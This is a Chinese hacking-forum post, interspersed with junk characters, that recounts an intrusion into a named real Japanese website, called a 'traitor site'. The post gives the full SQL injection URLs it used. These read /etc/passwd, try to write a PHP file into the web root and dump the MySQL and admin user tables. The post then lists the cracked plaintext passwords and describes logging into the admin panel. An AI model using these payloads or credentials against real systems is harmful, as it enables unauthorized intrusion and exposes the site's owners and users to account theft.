中国网络渗透测试联盟

标题: 原创 检测汉奸站全过程 [打印本页]

作者: xiancda    时间: 2012-9-17 16:22
标题: 原创 检测汉奸站全过程
补:www.zuaa.jp测试

! H  N3 ~" Q6 a1 [" K$ K9 U' f
0x01. 检测 www.zuaa.jp 收集数据% L2 Q* \  L6 J$ ]
[attach]73[/attach]6 o% U2 x7 G5 H+ Z, {# Z( k
6 p2 i; y! C; N" X7 J/ q% x& J
whatweb! E7 z/ O: K, y8 U
[attach]74[/attach]  j/ ?$ s0 M$ a0 F4 [

; j5 x9 Q. k: @/ v3 ]' _1 t$ ]利用NMAP扫描! k! v! e; L! g0 Y# }* o# U0 v
[attach]75[/attach]" M5 a, d# v! y. W/ y6 w% O3 K6 {5 T' \/ `
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持+ k* ?! k* [" T; u) H: U
0x02.找注入点% O9 {" J' N; J6 O/ z  n  R
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390; }2 f: M* ]' Y4 Q
[attach]76[/attach]/ U+ ~# e" L% N4 D5 Z
; g9 u4 K1 i% x
0x03.order by% w5 P. ^; u5 t
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1. H0 C2 U5 u% ^" ^- f
[attach]77[/attach]- q- V: n' z, G
order by 28报错,order by 27正常
# E. S" |$ l/ n+ y9 }
# \5 d* @/ ]! A" a0x04.   union手动查询9 Y6 g  l7 F% o, Z; H5 E+ b4 e
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
; ]/ \) A2 R% V* Q) ^+ p添加到 27 时正常显示 % q7 Q: V8 e0 D" `  m
[attach]78[/attach]
/ J* Q5 O! [" f  r5 T0 J9 j5 ^中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
+ p  A; A2 c, F5 W% G7 d3 ^' K8 L' C3 A- j7 n! g( c& I; K6 h
0x05. info:
+ @: k8 R2 F! U2 Q3 Z& ghttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
% q6 s. S  x9 p1 w4 Q; U[attach]79[/attach]1 f" j- Z: y, h3 F6 i7 V- Y# Y
user:            root@localhost
: U! k! j6 i- x1 o; C! m8 xdatabase:    openpne5 C" Q( n" P, y
version:      4.1.224 h' }9 D4 A+ o0 j5 b
os:             portbld-freebsd5.4, i2 q0 h; W* ]7 l5 V
' P) x' ^5 @* ?4 }( |& K* M+ b) Z
0x06. root用户- U' y6 k0 P) y$ U6 K% z
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
2 h0 x' ?; t- n* S. l; M. uhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ! P! ]. y$ M7 B  j
[attach]80[/attach]4 N; L. _0 S+ W
通过工具转换
! |+ \( s$ p" q) M[attach]81[/attach]
) U4 G! q6 k8 f; Y5 z" d中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
! H; j- f8 b" ?: u6 g; ~4 N, _
0 S. f# U6 b5 b" R4 H& @0x07. 利用 into outfile# K2 S. J$ k- a# d& Z. U" ~9 v) B
全部都失败' S$ M( a8 C; z8 `3 F/ ?7 E! W% M: o
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
# r2 u/ N8 s3 n+ d, c
7 V, J, s( P/ ?8 Z/ Q: o2 Yhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php 4 d" [& M" v/ i7 z+ f: p
2 b6 _9 \" `$ w1 ]# ^( w
页面显示“MDB2 Error:syntax error”* M5 q! _, G& n& o* g

' E8 B- x2 U! ^& V, k! y! K0x08. 利用 mysql 4.1
; k0 R! U1 y: |猜常规表名,字段未果 工具 sqlmap. I5 }( k$ U: F( ]
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持8 o( y+ |% j3 N7 F
. {! g( n$ b# |1 Q4 ?$ H
[attach]82[/attach]2 ^/ S# H) P8 V" `

: b' v6 j6 t, O! h3 I0x09. 查找后台: O8 k; x8 R, W
利用 现有的各种 后台工具尝试都不行
  W, _" m+ J6 ~1 D
' s) j7 o  ]& M- \! B9 Y0x10.  MySL外联方法
$ }2 n; }( ^0 |7 ?; W* L从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行' z9 |; o. k3 y0 _
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
3 D8 R) x6 Q; Z  D7 Qhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
7 ^9 }4 y/ S+ [8 c2 o4 C$ v3 d[attach]83[/attach]# j. Q, |% L/ S
这个可以在 www.cmd5.com 解密
% ]* t5 M& F- l3 groot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
3 K( j4 k! r- o" ]7 c& Echen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
- p: U, B8 A3 \% ~6 T! `4 Nopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
2 @. q* h1 L  ~+ Q+ izuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
! \% D) G7 J+ k# d5 u3 U9 Y1 Q' B! R工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知" l; w! _$ C7 d& |7 V
[attach]84[/attach]
) P6 x- U$ O6 z9 y2 ~: i
4 X! j+ U* L. o) C& i) R# M0x11. 网站突破
; x' t! k9 [4 A  k! t. s) @发现网站的源程序 openpne, google 下载 openpne 源码
% ^3 N7 a0 q5 J, A+ O[attach]85[/attach]
1 l  e4 e2 d5 N3 E
" t4 I# e1 \1 s, Z6 B% g0x12. 默认信息利用' ~6 n  J1 Z9 y) n- c0 P; _
http://sns.zuaa.jp/?m=admin&a=page_login# _* h. b5 e/ Z" G/ w0 t5 d
[attach]86[/attach]1 B4 _& P; b* Q# \/ o+ w8 \
表名 (c_admin_user) ,字段名(username,password)& n8 D3 K4 n, o6 \1 o
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user  T( e& I. Y0 b) Z. J
[attach]87[/attach]2 |7 E6 ?7 }' p8 I$ S% B
解密
4 r! {& Q% F" e/ K( u6 l1 [+ |# a/ `zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa20098 }9 E, |& X, r0 G
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
; _2 v1 I9 g1 q: h
( ]& {: z8 e$ d/ i) X4 `; c- t中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
  X$ R  a/ R5 ]8 W( a5 o; v% @3 F0 g0 _6 ^+ K
0x13. 登录后台: F+ K% ?  M  S. p
[attach]88[/attach]
* v9 {& z7 W: v- C. h* o1 R# w- {8 s$ C# z4 H# h1 i! D5 |0 R
( m8 K1 h  v" n2 f
0x14. 小结
- f' W8 H* R7 \# S$ }利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。4 M0 d7 W; \4 B% f# y( E7 L* }
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
% J7 g6 Y; V$ B9 @" V1 R( R( A------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
, ?( F4 X) @5 p. n2 {" g中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
3 T% H+ L/ I6 N7 H" `& i
. c' s4 U: o7 d1 R最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!  u6 z) g# z1 _8 ^3 m6 A

作者: 荒村狂客    时间: 2012-9-19 08:27
哪个牛人 费的这劲 入侵的




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2